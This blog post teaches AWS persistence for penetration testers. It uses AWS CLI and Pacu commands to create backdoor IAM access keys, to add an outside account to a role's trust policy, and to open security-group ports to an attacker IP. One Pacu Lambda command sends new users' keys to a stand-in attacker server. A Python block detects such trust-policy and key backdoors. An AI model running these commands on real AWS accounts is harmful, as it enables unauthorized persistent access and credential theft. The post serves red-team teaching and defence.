AWS Penetration Testing Part - 3: Using Boto3 and Pacu to Maintain AWS Persistence

March 17, 2025
AWS Security, Pentesting, Persistence

Using Boto3 and Pacu to Maintain AWS Persistence

Establishing persistence in an AWS environment allows penetration testers to maintain privileged access, even if their initial compromise is detected and revoked. This blog post focuses on leveraging Boto3 and Pacu to implement AWS native persistence techniques such as creating backdoor IAM credentials, manipulating trust relationships, and more.

πŸ›‘οΈ What Is AWS Persistence?

Persistence refers to maintaining access to an environment over time, even when defensive actions try to remove that access. In AWS, persistence might involve:

  • Backdoor IAM credentials
  • Malicious Lambda functions
  • Modified security groups
  • Exploiting trust relationships

We’re focusing on cloud native persistence, rather than traditional malware or implants.

πŸ” IAM Backdoors: Access Keys

Every IAM user in AWS is allowed two access key pairs. If an attacker already has access to one key, they can create a second pair using create-access-key assuming the limit hasn't been reached.

1aws iam list-users --profile Test
2aws iam list-access-keys --user-name Sarah --profile Test
3aws iam create-access-key --user-name Sarah --profile Test

Once keys are generated, they can be configured locally

1aws configure --profile Sarah

Or imported into Pacu

1set_keys

πŸ” This method enables privilege escalation if the user has iam:CreateAccessKey, even if their original privileges are minimal.


🧰 Pacu for Persistence

Using Pacu, this task is made effortless. The iam__backdoor_users_keys module automates the creation of access keys for other users in the environment.

run iam__backdoor_users_keys

This creates an additional key pair for a target IAM user, providing fallback access. You can also supply a specific username.

🤝 Backdooring Role Trust Relationships

IAM roles can be assumed across AWS accounts. Modify a role’s trust policy to add your attacker AWS account as a trusted principal:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": [
          "arn:aws:iam::111111111111:root",
          "arn:aws:iam::012345678912:root"
        ]
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

Then apply it with:

aws iam update-assume-role-policy --role-name Admin --policy-document file://trust-policy.json --profile Test

To automate it using Pacu:

run iam__backdoor_assume_role --role-names Admin --user-arns arn:aws:iam::012345678912:root
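As an added defensive example (not code from the original post, from Pacu or from Boto3 itself), the helpers below flag the artifacts that the access-key and trust-policy techniques above leave behind: a role trust policy that admits an account outside your own, and a user who suddenly holds a second, freshly created active key. They consume the structures boto3 returns from get_role()['Role']['AssumeRolePolicyDocument'] and list_access_keys()['AccessKeyMetadata'], so they can be run offline on the constructed sample data here or wired to live calls; the audited account ID 111111111111, the user name and the key IDs are assumptions.

```python
import re
from datetime import datetime, timedelta, timezone

ARN_ACCOUNT = re.compile(r"^arn:aws:iam::(\d{12}):")  # captures the 12-digit account ID

def _principals(statement):
    """Normalise a statement's Principal to a list of AWS principal strings."""
    principal = statement.get("Principal", {})
    if principal == "*":
        return ["*"]
    aws = principal.get("AWS", [])
    return [aws] if isinstance(aws, str) else list(aws)

def foreign_trusts(trust_policy, own_accounts):
    """Principals that let an account outside own_accounts assume the role
    (the edit update-assume-role-policy makes). Conditions are not evaluated."""
    findings = []
    for stmt in trust_policy.get("Statement", []):
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        if stmt.get("Effect") != "Allow" or not any(
                a in ("sts:AssumeRole", "sts:*", "*") for a in actions):
            continue
        for p in _principals(stmt):
            m = ARN_ACCOUNT.match(p)
            if p == "*" or (m and m.group(1) not in own_accounts):
                findings.append(p)
    return findings

def suspicious_keys(key_metadata, now, max_age_days=7):
    """Key ID of a recently created second active key: the footprint left by
    create-access-key / iam__backdoor_users_keys on a user who already had one."""
    active = [k for k in key_metadata if k["Status"] == "Active"]
    if len(active) < 2:
        return []
    newest = max(active, key=lambda k: k["CreateDate"])
    recent = now - newest["CreateDate"] <= timedelta(days=max_age_days)
    return [newest["AccessKeyId"]] if recent else []

# Constructed sample data shaped like boto3 output; 111111111111 is assumed to be the audited account.
NOW = datetime(2025, 3, 17, tzinfo=timezone.utc)
SAMPLE_TRUST = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
    "Principal": {"AWS": ["arn:aws:iam::111111111111:root", "arn:aws:iam::012345678912:root"]}}]}
SAMPLE_KEYS = [  # like iam.list_access_keys(UserName="Sarah")["AccessKeyMetadata"]
    {"UserName": "Sarah", "AccessKeyId": "AKIAEXAMPLE000000001", "Status": "Active",
     "CreateDate": NOW - timedelta(days=400)},
    {"UserName": "Sarah", "AccessKeyId": "AKIAEXAMPLE000000002", "Status": "Active",
     "CreateDate": NOW - timedelta(hours=3)},
]
```

Run over every role and user in the account, foreign_trusts and suspicious_keys give a quick inventory to compare against CloudTrail UpdateAssumeRolePolicy and CreateAccessKey events.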

πŸ” Backdooring EC2 Security Groups

Inject rules into EC2 security groups to whitelist your IP for specific ports

1aws ec2 authorize-security-group-ingress --group-id sg-XYZ --protocol tcp --port 27017-27018 --cidr 1.1.1.1/32

Pacu automation

1run ec2__backdoor_ec2_sec_groups --ip 1.1.1.1/32 --port-range 27017-27018 --protocol tcp --groups corp@us-west-2

🧠 Lambda-Based Persistence

Lambda for Credential Exfiltration

Deploy a Lambda function that triggers on user creation and sends the new access keys to your server.

Pacu automates this:

run lambda__backdoor_new_users --exfil-url http://attacker-server.com/

Cleanup:

run lambda__backdoor_new_users --cleanup

✅ Summary

Establishing persistence in AWS is a critical skill for red teamers. Boto3 provides full control for manual scripting, while Pacu accelerates and automates most processes. Use these techniques responsibly and always clean up after your assessments.